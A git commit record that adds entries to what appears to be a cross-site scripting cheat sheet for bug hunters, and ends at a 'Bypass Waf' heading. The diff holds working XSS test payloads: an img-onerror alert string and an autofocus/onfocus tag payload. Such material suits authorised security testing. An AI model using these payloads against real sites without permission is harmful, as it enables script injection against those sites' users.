GITBOOK-116: change request with no subject merged in GitBook

This commit is contained in:
Xalgord 2024-10-07 13:43:03 +00:00 committed by gitbook-bot
parent 76e5650421
commit 73735acaa5
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF

View file

@ -41,6 +41,12 @@ The vulnerable parameter for XSS should have Unfiltered : **\[“ < > $ | (
"><img%20src=x%20onerror="alert(%27POC%20By%20Xalgord%27)"
```
**any name tag xss payload:**
```
<x onfocus=alert(1) autofocus tabindex=1>
```
**Bypass Waf Pyaload:**
```